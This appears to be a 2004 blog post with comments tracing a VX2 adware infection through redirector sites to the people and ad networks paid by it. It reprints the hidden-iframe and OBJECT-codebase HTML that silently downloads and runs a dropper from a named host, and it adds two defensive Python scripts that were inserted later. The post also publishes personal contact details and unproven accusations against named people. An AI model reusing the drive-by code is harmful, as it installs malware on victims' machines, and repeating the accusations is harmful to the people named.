
[EDIT] This particular post has generated a very large amount of email, and apparently is being read by a large number of people infected with VX2. As a result, I've edited it, to clean up typos and to add additional information about the exploits used, the way VX2 works, and the sources of the spyware scourge. New information is identified with [EDIT].

If you're reading this post and you're on a Windows computer, the odds are overwhelming--between 80% and 90%--that you are infected with at least one virus or spyware program, and the odds are very high that you're infected with dozens or hundreds.

Yes, you. Even if you are technically literate, you have a firewall, and you never download suspicious attachments, you are almost certainly infected. There is lots and lots and lots of money in computer viruses and spyware, especially the variety that makes popup ads appear on your machine. The question I've always had, though, is who's making all this money by infecting your computer?

A couple nights ago, Shelly's computer became infected. Shelly's technically savvy, the apartment we live in is on a closed private network with a hardware firewall between us and the Internet, and she also runs a software firewall on her computer, and she became infected nonetheless.

I spent about six hours removing the infection, and also tracking down the source of the infection, and painstakingly backtracking all the popup ads that the adware displayed on her computer. My goal: Follow the money. Discover where the infection came from, and who was making money from it. The results were, to say the least, interesting.

If you don't care about stuff like this, you can skip the rest of this message. If you're curious about the mechanisms by which spyware and viruses work, who is responsible for them, why they're so common, how they spread, and most important, who makes money by creating and releasing them, read on.

Shelly's computer started behaving strangely, taking a long time to boot and displaying popup ads whenever she launched Internet Explorer, late Wednesday afternoon. Running the anti-spyware program Ad-Aware revealed that the computer was infected with a very nasty bit of malware called VX2, first introduced to the Internet public by a company calling itself VX2, which has since become defunct. The VX2 program has continued to be developed and to become nastier, more destructive, and more malicious as time goes on; today's VX2 is extremely sophisticated, highly destructive, and almost impossible to remove.

Ad-Aware and a similar program called Spybot Search & Destroy could see the infection, but could not remove it. VX2 remains memory-resident, even if its files are deleted, and constantly monitors attempts to get rid of it; if it is removed or the computer's Registry is changed, this evil little bastard changes the Registry back and rewrites itself to disk under a different name. It also sets itself up as a critical system service (so it runs even when the computer is booted in safe mode), and cloaks itself so that it does not appear in the Task Manager. [EDIT]: Earlier versions of VX2 could only conceal themselves in the Task Manager under Windows 95/98/Me; VX2 Variant 3 appears to be able to conceal itself in the Task Manager under Windows NT/2000/XP as well.

Ad-Aware has a special plug-in module written especially to remove VX2. This plug-in confirmed that Shelly's computer was infected with what it described as "VX2 Variant 3," but even the plug-in could not remove the infection; it appears that Shelly had become infected with a brand-new VX2 variant, more cunning and more malicious than even the worst variant known to Ad-Aware.

But from where?

Now things get interesting. In following the source of the infection, I ended up in a virtual trip that went from Dallas, Texas, through servers in Russia and Nevada, and finally back to the source in Rosemount, Minnesota. Along the way, it involved a surprising number of big-name, supposedly reputable companies, all of whom are profiting either directly or indirectly from viruses and spyware.

Shelly's computer first became infected when her browser visited the Web address " normal/yyy12.html". At the time I am writing this, this Web address is still active. *** WARNING *** WARNING *** WARNING I have put a space in this URL to keep people from clicking accidentally on it. Do NOT visit this URL if you are on a Windows machine and you're using Internet Explorer. You WILL become infected. I don't know what brought her to that site; it may have been a redirect, a browser hijack, even a maliciously constructed banner ad.

[EDIT]: The site infects a computer using what is commonly called an Explorer iFrame exploit. Put most simply: a Web page contains a hidden (zero-size) iFrame that points to another Web page, and that page contains an OBJECT tag whose codebase attribute points at an executable file (in this case, a dropper for VX2). Internet Explorer fetches that file and runs it silently, without the user's knowledge or consent; the iFrame is only the container that keeps the whole thing invisible. Versions of Internet Explorer prior to the version that shipped with Windows XP SP2 are all vulnerable; I have not tested the version of Explorer that shipped with XP SP2 or versions patched by subsequent security fixes. I do know that Microsoft has since closed several iFrame exploits. I do not know if this exploit is one of them.

The Web site at is running on a computer whose ISP connection is provided by a company called Rackspace, a large and busy Texas-based ISP with international offices and a long history of supporting and condoning spam and other unethical behavior; in fact, Rackspace even has its own entire section on the Blackholes.us spam support blacklisting service.

So Rackspace is the first company profiting from the infection; they're making money by providing Internet connections for the URL hosting the malware dropper. Remember the name Rackspace; we'll be seeing it again later.

So. Moving along: The virus-dropping Web site at is nothing but a simple redirector. It redirects (by way of a hidden iFrame) to " ads/banners/banner3.php?ID=1". Again, I have put a space in this URL. Do NOT visit this URL if you are on a Windows machine and using a vulnerable version of Explorer; you WILL become infected. [EDIT]: This page is loaded by the iFrame on the preceding page, and itself contains an iFrame pointing to the next server in the chain, which carries the OBJECT tag that pulls in the actual dropper; we'll get to that in a moment.

This Web site is hosted on a server in Russia; the ISP is a Russian service called Linkey.ru. They are the second group of people in the chain making money from viruses and spyware, by hosting a virus dropper. I don't know if they're a knowing participant or just an innocent ISP who's unknowingly hosting a virus dropper. [EDIT]: Additional information from a helpful reader on the news.admin.net-abuse.email newsgroup:
The Russian-hosted Web site is: = Adsavior.com
11/08/04 11:05:06 dns Adsavior.com
Adsavior.com NS (Nameserver) ns1.adsavior.biz
Adsavior.com NS (Nameserver) ns2.adsavior.biz
Adsavior.com A (Address)
mail.Adsavior.com A (Address)
ns1.adsavior.biz A (Address)
ns2.adsavior.biz A (Address)
Adsavior Inc.
James Finlayson
#395-1027 Davie St.
Vancouver, BC V6E4L2
Phone: 6046969057
Email: jamesinflames69@hotmail.com
Registrar Name....: Register.com
Registrar Whois...: whois.register.com
Registrar Homepage: http://www.register.com
Created on..............: Thu, Sep 16, 2004
Expires on..............: Fri, Sep 16, 2005
Record last updated on..: Mon, Oct 04, 2004
It appears that linkey.ru and IPs in the same general block as "Adsavior.com" are well known for Net abuse. Mr. Finlayson, another Canadian, appears to be deeply involved in this particular virus/adware gang as well.
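As an added example (not part of the original post or the reader's submission), here is a small Python parser for the register.com-style record quoted above. It pulls the registrar, creation date and nameservers out of the dotted-leader "key: value" lines and the "name TYPE (label) value" DNS rows, and then computes the two things a follow-the-money trace checks first: how old the domain was at the moment the lookup was made, and whether the registrant contact hides behind a throwaway webmail address. The 90-day "young domain" threshold and the webmail domain list are my assumptions, not anything the post states; the blank A-record values are left blank because the page shows them blank.

```python
"""Parse a register.com-style WHOIS/DNS dump and derive triage indicators.

The record below is the one quoted in the post, reproduced as the page
shows it (the A-record addresses were blank on the page and stay blank).
"""
import re
from datetime import datetime

SAMPLE_RECORD = """\
11/08/04 11:05:06 dns Adsavior.com
Adsavior.com NS (Nameserver) ns1.adsavior.biz
Adsavior.com NS (Nameserver) ns2.adsavior.biz
Adsavior.com A (Address)
mail.Adsavior.com A (Address)
ns1.adsavior.biz A (Address)
ns2.adsavior.biz A (Address)
Adsavior Inc.
James Finlayson
#395-1027 Davie St.
Vancouver, BC V6E4L2
Phone: 6046969057
Email: jamesinflames69@hotmail.com
Registrar Name....: Register.com
Registrar Whois...: whois.register.com
Registrar Homepage: http://www.register.com
Created on..............: Thu, Sep 16, 2004
Expires on..............: Fri, Sep 16, 2005
Record last updated on..: Mon, Oct 04, 2004
"""

# "11/08/04 11:05:06 dns Adsavior.com": when the lookup ran and which domain was queried
HEADER_LINE = re.compile(
    r"^(?P<ts>\d\d/\d\d/\d\d \d\d:\d\d:\d\d)\s+dns\s+(?P<domain>\S+)$")
# "Adsavior.com NS (Nameserver) ns1.adsavior.biz"; the value may be missing
DNS_LINE = re.compile(
    r"^(?P<name>\S+)\s+(?P<type>NS|A|AAAA|MX|CNAME)\s+\((?P<label>\w+)\)\s*(?P<value>\S*)$")
# Heuristic: registrant hiding behind free webmail. Assumed list, not from the post.
FREEMAIL_DOMAINS = {"hotmail.com", "yahoo.com", "gmail.com", "mail.ru"}
YOUNG_DOMAIN_DAYS = 90  # assumed threshold for "registered just before it started dropping malware"


def parse_record(text):
    """Split the dump into header, DNS rows, 'key: value' fields and free-form contact lines."""
    rec = {"domain": None, "observed": None, "dns": [], "fields": {}, "contact": []}
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = HEADER_LINE.match(line)
        if m:
            rec["observed"] = datetime.strptime(m["ts"], "%m/%d/%y %H:%M:%S")
            rec["domain"] = m["domain"].lower()
            continue
        m = DNS_LINE.match(line)
        if m:
            rec["dns"].append((m["name"].lower(), m["type"], m["value"] or None))
            continue
        if ":" in line:
            # "Created on..............: Thu, Sep 16, 2004" -> ("created on", "Thu, Sep 16, 2004")
            key, value = line.split(":", 1)
            rec["fields"][key.strip(" .").lower()] = value.strip()
            continue
        rec["contact"].append(line)  # registrant name/address lines carry no colon
    return rec


def parse_whois_date(s):
    """Dates in this record look like 'Thu, Sep 16, 2004'."""
    return datetime.strptime(s, "%a, %b %d, %Y")


def indicators(rec):
    """Red flags an analyst notes before writing to the registrar or the host."""
    created = parse_whois_date(rec["fields"]["created on"])
    age_days = (rec["observed"] - created).days
    email = rec["fields"].get("email", "").lower()
    return {
        "registrar": rec["fields"].get("registrar name"),
        "created": created.date().isoformat(),
        "domain_age_days": age_days,
        "young_domain": age_days < YOUNG_DOMAIN_DAYS,
        "freemail_contact": email.rsplit("@", 1)[-1] in FREEMAIL_DOMAINS,
        "nameservers": [v for _, t, v in rec["dns"] if t == "NS" and v],
    }


if __name__ == "__main__":
    for key, val in indicators(parse_record(SAMPLE_RECORD)).items():
        print(f"{key:18} {val}")
```

Run against the record above, the domain comes out 53 days old at the time of the lookup, registered through a free Hotmail address, with its nameservers parked under a sibling .biz name: three things worth writing down before the whois record itself changes or the domain lapses.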

Onward and upward: The Russian virus host itself is also nothing but a redirector. Clearly, the person responsible for the virus wants to put some distance between himself and the virus; we've already gone through two redirectors in two countries. The Russian Web site contains the next stage of the Internet Explorer iFrame exploit: a hidden iFrame that causes Internet Explorer to load the page at "http://www.xzoomy.com/ stc.php?stid=007". Once again, I have put a space in the URL; if you visit this Web site, and allow your browser to download the executable that it references, you'll be infected with VX2.

Now we're getting somewhere. The xzoomy.com Web site is a search engine that's well-known in anti-virus and anti-spyware circles. Xzoomy.com makes a small profit every time someone uses their Web page to do a search; they have a long and ignoble history of attracting visitors through the use of spyware, adware, and viruses. They've been responsible for their own spyware/adware software, and they've got their hands in an Internet gambling site called "free scratch and win" as well. These guys are looking more and more like our scumbags, eh? This site is registered to:

Mike Cass (domains@adscpm.com)
Fax: +1.0000000000
181 Coniston St
Winnipeg, MB R2H1P8

So Mike Cass is up to his ears in this mess. Mike's Web site, well-known for being the source of spyware and adware, is hosted by an ISP called Peer 1 Network, an outfit in Montreal known to be indifferent to spammers. Mike and Peer 1 Network are making money here--Peer 1 by hosting Mike's Web site in spite of the fact that it's known to be associated with adware and spyware, Mike because he makes money every time someone visits his site. But wait, there's more!

The xzoomy.com Web site is the last redirector. Its page consists of an OBJECT tag whose codebase attribute points at "http://www.2nd-thought.com/ files/install007.exe" (I've put a space in the URL); Internet Explorer downloads that Windows program from the 2nd-thought.com Web site and executes it. [EDIT]: This file, install007.exe, is the actual executable that installs the adware. If you're using Explorer for Windows and you visit any of the pages before this in the chain, install007.exe downloads and runs silently without prompting you, because the OBJECT tag that references it is loaded inside a hidden iFrame. This is also why other browsers are safer: they render iFrames like any other browser does, but they don't implement the ActiveX OBJECT/codebase installation mechanism that Explorer uses to fetch and run the referenced program.

The program install007.exe loads and runs as soon as the browser hits that page; the computer's owner never gets any warning and has no opportunity to stop it. As you may have guessed, install007.exe installs VX2 on the victim's computer.

Note that all this--the numerous redirects, downloading the program from the 2nd-thought Web site, installing the VX2 virus--all happened automatically and silently; at no point is the computer owner aware of what is going on, and at no point does the computer owner know that a virus is being loaded onto his computer.
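The chain just described, as an added example that is not part of the original post: a Python script that walks saved copies of the pages statically, so nothing is fetched and nothing runs. It follows each page's frame to the next page, stops at the first OBJECT tag, and flags the combination that makes this a drive-by dropper: at least one hidden (0x0 or 1x1) frame in the path and a codebase that points at an executable. The pages below are constructed stand-ins; the hosts are placeholders (the post withheld the first two), while the frame attributes, CLSID and file name mirror what the post's view-source reproduces. For a real triage run, replace the dict with responses saved from a non-Windows box.

```python
"""Statically walk a hidden-iframe -> iframe -> OBJECT codebase drive-by chain.

Pages are supplied as a dict of URL -> HTML captured offline, so nothing is
fetched; point a real run at saved responses (curl/wget from a non-Windows box).
"""
from html.parser import HTMLParser
from urllib.parse import urljoin

# File types the affected IE versions would fetch and run via an OBJECT codebase
EXECUTABLE_SUFFIXES = (".exe", ".cab", ".msi", ".scr", ".com", ".dll", ".ocx")

# Constructed stand-ins for the three pages the post describes. Hosts are
# placeholders; attributes, CLSID and file name follow the post's view-source.
START_URL = "http://redirector1.example/normal/page.html"
SAMPLE_PAGES = {
    START_URL:
        '<IFRAME SRC="http://redirector2.example/ads/banners/banner3.php?ID=1" '
        'height="0" width="0" SCROLLING=no MARGINHEIGHT=0 MARGINWIDTH=0 FRAMEBORDER=0>',
    "http://redirector2.example/ads/banners/banner3.php?ID=1":
        '<iframe src=http://redirector3.example/stc.php?stid=007 width="1" height="1" frameborder="0">',
    "http://redirector3.example/stc.php?stid=007":
        '<object id=install classid="CLSID:13197ACE-6851-45c3-A7FF-C281324D5489" '
        'codebase="http://dropper.example/files/install007.exe">',
}
# An ordinary, visible banner frame for contrast (also constructed).
BENIGN_URL = "http://publisher.example/index.html"
BENIGN_PAGES = {
    BENIGN_URL: '<html><body><iframe src="http://ads.example/banner.html" '
                'width="468" height="60"></iframe></body></html>',
    "http://ads.example/banner.html": '<html><body><img src="ad.gif"></body></html>',
}


def _dimension(attrs, name):
    """Numeric width/height, or -1 when absent or non-numeric (e.g. '100%')."""
    raw = attrs.get(name, "").strip().lower().rstrip("px")
    try:
        return int(raw)
    except ValueError:
        return -1


def _is_hidden(attrs):
    """0x0 and 1x1 frames are the classic invisible drive-by container."""
    return 0 <= _dimension(attrs, "width") <= 1 and 0 <= _dimension(attrs, "height") <= 1


class HopExtractor(HTMLParser):
    """Collect iframe/frame sources and OBJECT codebase URLs from one page."""

    def __init__(self, base_url):
        super().__init__()
        self.base_url = base_url
        self.hops = []  # dicts: kind, url (absolute), hidden, clsid

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}  # HTMLParser lowercases tag names
        if tag in ("iframe", "frame") and a.get("src"):
            self.hops.append({"kind": tag, "url": urljoin(self.base_url, a["src"]),
                              "hidden": _is_hidden(a), "clsid": None})
        elif tag == "object" and a.get("codebase"):
            self.hops.append({"kind": "object", "url": urljoin(self.base_url, a["codebase"]),
                              "hidden": False, "clsid": a.get("classid") or None})


def follow_chain(pages, start_url, max_hops=10):
    """Ordered hops from start_url to the first OBJECT tag (or until nothing more to follow)."""
    chain, seen, url = [], set(), start_url
    while url in pages and url not in seen and len(chain) < max_hops:
        seen.add(url)
        p = HopExtractor(url)
        p.feed(pages[url])
        if not p.hops:
            break
        hop = p.hops[0]  # these dropper pages carry exactly one tag each
        chain.append(hop)
        if hop["kind"] == "object":
            break
        url = hop["url"]
    return chain


def is_dropper_chain(chain):
    """True when the chain ends in an OBJECT codebase naming an executable and
    passed through at least one hidden frame on the way (the post's pattern)."""
    if not chain or chain[-1]["kind"] != "object":
        return False
    target = chain[-1]["url"].split("#", 1)[0].lower()  # drop IE's '#version=...' suffix
    return target.endswith(EXECUTABLE_SUFFIXES) and any(h["hidden"] for h in chain[:-1])


if __name__ == "__main__":
    for hop in follow_chain(SAMPLE_PAGES, START_URL):
        print(f"{hop['kind']:7} hidden={hop['hidden']!s:5} {hop['url']}")
    print("dropper chain:", is_dropper_chain(follow_chain(SAMPLE_PAGES, START_URL)))
```

The same walk over the benign publisher page stops after one visible 468x60 frame and is not flagged; the sample chain is flagged because both frames are hidden and the OBJECT codebase names an .exe. The codebase check also strips IE's "#version=..." suffix, which real droppers of the period often carried.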

2nd-thought.com is the primary villain here. They are hosting the installer itself; they are the people actually placing VX2 on the victims' computers without permission or notification. Let's take a look-see and find out who these guys are:

Domain name: 2nd-thought.com

Registrant Contact:

Don Lativalle (abuse@2nd-thought.com)
Fax: +1.0000000000
3597 boul St-Jean
Dollard des Ormeaux, H9X2B5

Well, lookit that, another Canuck. What is up with Canadian spyware and virus profiteers, eh? Does Canada have particularly lax computer-crime laws?

2nd-thought.com is hosted by Peer 1 Networks as well. 2nd-thought.com is also a well-known scourge on the Internet, notorious for releasing a spyware program that changes your home page to their page, and for redirecting search engine searches you do to porn sites. That's two scumbags with long histories of Internet abuse, both hosted on Peer 1 Networks and both, apparently, now working together. Mike Cass, Don Lativalle, and Peer 1 Networks: three people or organizations with shady pasts and questionable ethics, three people or organizations who are apparently involved with loading VX2 onto Shelly's computer.

So now we know how VX2 ended up on Shelly's computer. We know what people are responsible, we know what businesses support and profit from them, and we know they've gone to a whole lot of trouble and effort to hide themselves. We know that the people, Mike Cass and Don Lativalle, have histories of releasing spyware and adware to infect people's computers, we know they run for-profit Web sites, and we know that they have independently established histories of using dubious and unethical practices to get traffic to those Web sites. We know they're both Canadian, we know they have found a Canadian ISP in Peer 1 Networks willing to turn a blind eye to outrageous network abuse, and we know that they appear to have teamed up to spread an extremely malicious variant of a program already known for being almost impossible to get rid of.

What's left is discovering the why. What's the mechanism by which they make money? How do they profit from infecting you with VX2? Where does the money come from, and where does it go?

For that, I had to turn to the actions that this VX2 variant takes once it's infected the computer, and to the ads it serves up.

This particular strain of VX2 does two things. First, it carries a payload unusual for adware; it loads another adware program called Bargain Buddy. Bargain Buddy's Web site is at cashbackbuddy.com, which is hosted by Globix, a Web-hosting company headquartered in the United Kingdom.

The cashbackbuddy.com Web site attempts to get people to deliberately infect themselves with the Bargain Buddy scumware by telling them "the new Software helps the end-user maximize his/her savings and gain cash back commissions from purchases made at all participating on-line and some offline merchants" (and so on, and so on). CashBackBuddy and its scumware is operated by an outfit called eXact Advertising:

eXact Advertising
101 W. 23rd Street, PMB 2392
New York, New York 10011
United States

eXact Advertising owns a number of different Internet properties, including pay-for-placement search engines, Mail.com, a personals Web site called "luvbandit," and so on.

The Bargain Buddy software is pretty straightforward: every now and then, it loads an ad on the victim's computer. Each time an ad is served, eXact Advertising makes a few cents from the advertisers who pay for the ads. Some of this money goes to Bargain Buddy "referrers;" the rest is profit.

So what that means is that if I sign up with eXact Advertising, then I get you to put the Bargain Buddy adware on your computer, every time an ad pops up, the advertiser pays eXact Advertising some money, and eXact Advertising pays me some money.

eXact Advertising claims to be "opt-in;" they say the only way you'll get Bargain Buddy is if you explicitly sign up and put it on your computer voluntarily. They lie, of course; the fact that they're doing businesses with referrers such as Mike Cass and Don Lativalle, who use very sneaky ways indeed to get the software onto your computer, proves it. They pretend to be good guys helping consumers save money; in reality, they don't care so long as people can be cajoled, tricked, or forced into installing their software, with or without their consent.

So. Now Shelly's computer is infected with two adware programs: Bargain Buddy by eXact Advertising, who is paying the people responsible for the infection, and a custom version of VX2, which prevents itself from being removed easily, installs Bargain Buddy, and also serves ads on its own.

Now popup ads are popping up all over the place. Some of them are from eXact Advertising, a shady company that's written its own custom adware. Some of them are from VX2 itself. It's the latter ones, the ones that VX2 is generating, that are the most interesting.

VX2 brings in ads from, of all places, Revenue.net, a very large mainstream online advertising broker that serves up banner ads, popup and popunder ads, and contextual ads for a lot of big-name clients. Revenue.net does serve popup ads and popunder ads, primarily from Web sites rather than adware. The ads being brought in from the VX2 infection were being pulled from Revenue.net; the persons responsible for the VX2 infection were Revenue.net affiliates.

I fired off an email to Revenue.net, with the URLs of some of the popup ads being pulled in by the virus. Revenue.net, rather to my surprise, actually responded, and claimed that the affiliate code attached to the popup ads appearing on Shelly's computer belonged to an outfit calling itself "look2me.com".

Look2me.com is--surprise surprise--a Web advertising company that makes money from popup ads. Look2me.com is a Revenue.net affiliate; Look2me.com gets people to view ads produced by Revenue.net, the advertiser pays Revenue.net, who then pays a percentage of the take to look2me.com.

Look2me.com is hosted by...wait for it...Rackspace! Told you their name would pop up again.

Look2me.com is owned by:

NicTech Networks info@look2me.com
3860 W 150TH ST
Rosemount, Minnesota 55068
United States

NicTech Networks also owns a dating service called "SimilarSingles.com". Sound familiar? eXact Advertising, based in New York, is an Internet advertising company that serves popup ads on virus-infected computers and also owns an online dating service. NicTech Networks, based in Minnesota, is an Internet advertising company that serves popup ads on virus-infected computers and also owns an online dating service. Two well-known and unethical Canadians, Mike Cass and Don Lativalle, each with separate histories of profiting from adware and malware, are jointly responsible for a computer infection which serves popup ads from eXact Advertising and NicTech Networks. NicTech Networks is hosted by Rackspace; the initial point of infection of the virus is a Web site hosted by Rackspace.

Rackspace is looking pretty bad here. In fact, Rackspace and Peer 1 Networks are both obviously dirty; both are up to their elbows in hosting and providing services for people who make money by serving popup ads through viruses and malware. It's hard to argue that either Rackspace or Peer 1 Networks is simply being duped by a client, particularly in light of the fact that emails to both outfits concerning this situation go unanswered, and in light of the fact that the virus-dropping Web site is still up three days after I've emailed the responsible hosts. [EDIT]: After complaining to both ISPs, I still have not had a response from either. As of this writing, neither Rackspace nor Peer 1 has taken any action against the Web sites named in this report.

So. Advertisers pay eXact Advertising and Revenue.net. eXact Advertising and Revenue.net then go on to pay affiliates who have infected target computers with malware to serve up the ads. The affiliates host their virus-dropping Web sites, along with Web sites that profit in other ways from viruses and malware, on Canadian ISP Peer 1 Networks and American ISP Rackspace.com. The money goes from the advertisers to eXact Advertising and Revenue.net; some of this money then goes to the affiliates, who infect the computers with malware; some of the money the virus-spreaders make in turn goes to Peer 1 Networks and Rackspace, who turn a blind eye to what their clients are doing. But where does the money originate? Obviously, the advertisers are only buying ads because they think the ads will work; that means somebody is clicking on these popup ads and buying the advertisers' products.

But who on earth would spend money on an annoying popup ad? What could possibly induce someone to take out his wallet when everyone knows that virus-spawned popup ads are among the most annoying things on Earth?

Ah, that's the pure genius of it--that's the brilliance of the scheme, honed to a fine edge. The popup ads you get when you're infected with VX2? They advertise...

...spyware removal and popup blocking tools.


Nov. 7th, 2004 10:46 am (UTC)
You are my hero :)
Nov. 7th, 2004 01:33 pm (UTC)
Great writeup. Makes it pretty obvious why one might want to consider using another browser, eh? (or, for the extreme, perhaps a different operating system? :)
Nov. 8th, 2004 10:07 am (UTC)
Yep. As a result of this problem, I think I'm installing another browser, possibly Firefox, on Shelly's computer this evening.

I use Windows, Linux, MacOS, and other operating systems--unfortunately, some applications (such as games) require using Windows. My primary machines are Mac and Linux systems, though; i try not to keep anything vital on my Windows machines, in case I have to wipe 'em. Unfortunately, Shelly doesn't have that luxury.
Nov. 7th, 2004 02:52 pm (UTC)
First of all, I'm going to do some investigating on my own. Like calling the local police station and inquiring about their dealings with computer crimes and what falls under the definition of such. See, it's interesting -- both Mike Cass and Don Lativalle have phone numbers that resolve to Rogers AT&T cellphones. Interestingly enough, despite Don's address being on the outskirts of Montreal, his phone claims he's my neighbour -- out in London, ON. Not sure what that indicates, but just an interesting fact.

I'd also be most curious to know the technical details of how you've traced it through that many hops. If you don't mind sharing, of course.
Nov. 8th, 2004 10:16 am (UTC)
Not at all!

I found the initial point of infection-- looking in Shelly's Explorer history file, which retains even redirects. From there, I visited the site on my MacOS X machine using Safari, which allows me to view the source code of a page even if the page has one of those damn stupid Javascript things designed to prevent me from doing so.

That page's source is nothing more than a single tag, without even HTML, HEAD, or BODY tags:

<IFRAME SRC=" ads/banners/banner3.php?ID=1" height="0" width="0" SCROLLING=no MARGINHEIGHT=0 MARGINWIDTH=0 FRAMEBORDER=0/> (note that I've inserted a space in the URL within the IFRAME tag).

So I manually visited that page with Safari; its source is likewise a single iFrame tag:

<iframe src=http://www.xzoomy.com/ stc.php?stid=007 width="1" height="1" frameborder="0">

the source of THAT page is a single OBJECT tag, as follows:

<object id=install classid="CLSID:13197ACE-6851-45c3-A7FF-C281324D5489" codebase="http://www.2nd-thought.com/ files/install007.exe"> (mind the space in the URL, as usual).

Install007.exe is, as you can guess, the actual executable for the malware.

The rest was a matter of using dig, traceroute, and whois searches. Whois on "xzoomy.com" produced the name Mike Cass; whois on "2nd-thought.com," the actual host of the malware dropper, produced the name Don Lativalle. Dig and traceroute turned up Rackspace and Peer 1 as the hosts of the named Web sites.

Given the lengths to which they've gone to hide their involvement, using redirectors scattered all over the place, it's not one bit surprising to me that they're using cell phones as their contact phone numbers, or that their contact addresses in the Whois registry might not be real.

Nov. 7th, 2004 03:24 pm (UTC)
Thank you.
Nov. 7th, 2004 03:24 pm (UTC)
Any chance of prosecuting the sons of bitches?
Nov. 8th, 2004 10:19 am (UTC)
Unlikely. Knowing that someone has committed a crime and proving it in court are two different things, especially in light of the fact that they appear to be in Canada and I'm in the US. It's not even entirely clear that what they're doing violates Canadian or US law, though clearly it should.

What I'd like to do is send them a bill for the time it took me to clean up the infection. I doubt that'd work, though.
Nov. 7th, 2004 05:24 pm (UTC)
That's a fascinating journey -- it was like reading Clifford Stoll's The Cuckoo's Egg.
Nov. 17th, 2004 01:50 pm (UTC)
I was thinking the same thing.

I used to do something similar on the college library. I would trace back who installed software that shouldn't be there. It eventually started to lead to a group of young men. They turned out to be crackers. They'd managed to gain root on a couple of our servers. The most we were able to do to them, though, was to ban them from the lab, since the dean was friends with one's mother. *shrugs*
Nov. 8th, 2004 12:02 am (UTC)
when I take over the world, you will be appointed my minister of "hunting people down so I can have them tortured, maimed, then left bleeding from open wounds in a horribly dirty cell filled with infectious bacteria."

you are a good man, Franklin. Highly useful.
Nov. 8th, 2004 10:20 am (UTC)
But I'm working on taking over the world myself! Much as I would love that job, I think I'd rather rule the world with an iron fist on my own... :)
Nov. 8th, 2004 05:05 am (UTC)
are we safe?
I have a Mac and Bu has a Linux... does this mean we are uninfected?
Nov. 8th, 2004 10:20 am (UTC)
Re: are we safe?
Yes. If you're running MacOS or Linux, you don't have to worry about this sort of thing. :)
Nov. 8th, 2004 06:40 am (UTC)
Re: virii
Makes me want to try setting up a system under vmware with my current anti-viral, anti-spyware solutions and try visiting those sites...
Nov. 8th, 2004 10:21 am (UTC)
Re: virii
That'd be a very, very interesting experiment. if you do, let me know what happens!
Nov. 8th, 2004 08:24 am (UTC)
I don't know what brought her to that site; it may have been a redirect, a browser hijack, even a maliciously-constructed banner ad.

VX2 got onto my system through the MSN toolbar. It's a stealth installer that can come in piggybacked on dozens of things. I've got two others, at the moment, that come in off of Yahoo and Google's toolbars respectively.

(Unfortunately, I can't disable either of those as I need them to run testing on our software as our users install them all the T*!#)*&!#&(*#!%^) time. The only way I've gotten around their services is to leave Spybot's agent running and it will tell you whether anything's attempting to change the registry and running Webroot's spyware software package that notifies you and allows you to disable it.

My current programs for spyware that are running as agents:

Ad-Aware (for removal only)
SpyBot S&D (agent running)
Pest Patron (agent running)
Webroot's Spy Sweeper (agent running)

Just as FYI, since you probably know most of it. :)

Nov. 8th, 2004 10:24 am (UTC)
In this particular case, neither Ad-Aware nor Spybot S&D could remove the infection. Ad-Aware has a special plugin just for VX2, and the plugin identified "VX2 Variant 3" on the computer and claimed to remove it, but didn't. That's why I suspect that what this was is some new variant on VX2 that's designed to evade current VX2 cleaners.

I haven't tried Pest patron or Spy Sweeper. I suppose I could reinfect the computer and give them a go, but all things considered, I'd rather not. :) It would, however, be helpful to know whether either of them can deal with this VX2 variant.
Nov. 8th, 2004 12:12 pm (UTC)
Spectacular bit of netrunning. This is like the game Uplink, only real. :-)

Magnificently done, sir. If, despite my efforts, you *do* manage to conquer the world, I think I'd like to apply for the job of leading your strike team to burn these people to the ground.
Nov. 8th, 2004 12:14 pm (UTC)
Oh, and great testimonial for the virtues of MacOS/Safari (or Linux/FireFox, for that matter) over Windows/IE. IT managers should read this.
Nov. 8th, 2004 01:23 pm (UTC)
Nice followback through the networks.

I followed your link from NANAE but what I found humourous was that this type of post violates the LJ TOS.
Nov. 9th, 2004 12:28 pm (UTC)
Additional information from a helpful reader on the news.admin.net-abuse.email newsgroup:
The Russian-hosted Web site is: = Adsavior.com

11/08/04 11:05:06 dns Adsavior.com
Adsavior.com NS (Nameserver) ns1.adsavior.biz
Adsavior.com NS (Nameserver) ns2.adsavior.biz
Adsavior.com A (Address)
mail.Adsavior.com A (Address)
ns1.adsavior.biz A (Address)
ns2.adsavior.biz A (Address)

Adsavior Inc.
James Finlayson
#395-1027 Davie St.
Vancouver, bc V6E4L2
Phone: 6046969057
Email: jamesinflames69@hotmail.com
Registrar Name....: Register.com
Registrar Whois...: whois.register.com
Registrar Homepage: http://www.register.com
Created on..............: Thu, Sep 16, 2004
Expires on..............: Fri, Sep 16, 2005
Record last updated on..: Mon, Oct 04, 2004

It appears that linkey.ru and IPs in the same general block as "Adsavior.com" are well known for Net abuse. Mr. Finlayson, another Canadian, appears to be deeply involved in this particular virus/adware gang as well.

Nov. 9th, 2004 12:38 pm (UTC)
Another followup, courtesy of a regular in the NANAE newsgroup:


This page describes another user's problem very similar to the one I dealt with on Shelly's computer, and confirms that Rackspace is dirty--they know what their clients are doing, and they approve and condone this activity. In particular, here is the text of a reply sent by Rackspace to another user who wrote to Rackspace and complained they were hosting virus droppers:

"From: abuse@rackspace.com [mailto:abuse@rackspace.com]
Sent: Friday, September 24, 2004 3:42 AM
To: steve
Subject: [Incident 040923-000056]

Recently you requested personal assistance from our on-line support center. Below is a summary of your request and our response.

If we do not hear from you within 48 hours we will assume your issue has been resolved.

Thank you for allowing us to be of service to you.


Suggested Answer
At 09/24/2004 03:42 AM we wrote -


Please send an email to info@look2me.com and ask for the uninstall script. If you would rather give them a phone call, they can be reached at 866-705-2728. Please update this ticket if you do not hear back from them within 48 hours and we will contact the customer.

Sydney McHale
Rackspace Managed hosting (TM)"

I was right--Rackspace knows EXACTLY what's going on, but since Rackspace is making money on it, Rackspace doesn't care. Dirty, dirty, dirty.
Nov. 27th, 2004 01:20 pm (UTC)
Huh? I don't see how... did you do what they asked, first?
Nov. 16th, 2004 11:31 pm (UTC)
Yes, you. Even if you are technically literate, you have a firewall, and you never download suspicious attachments, you are almost certainly infected.

Nope, sorry. I don't bother with a firewall or "antivirus" software, either. I don't know how everyone else gets so much of this stuff. Probably Outlook.

Do NOT visit this URL if you are on a Windows machine; you WILL become infected.

No, I won't. IE asks me if I would like to install something, and I say no. End of story. I'm using IE6 with more or less the default settings, and it's probably even a few patches behind the curve, since I haven't yet applied SP2 here. Perhaps you need to change "Download signed ActiveX controls" to something other than "Enable".
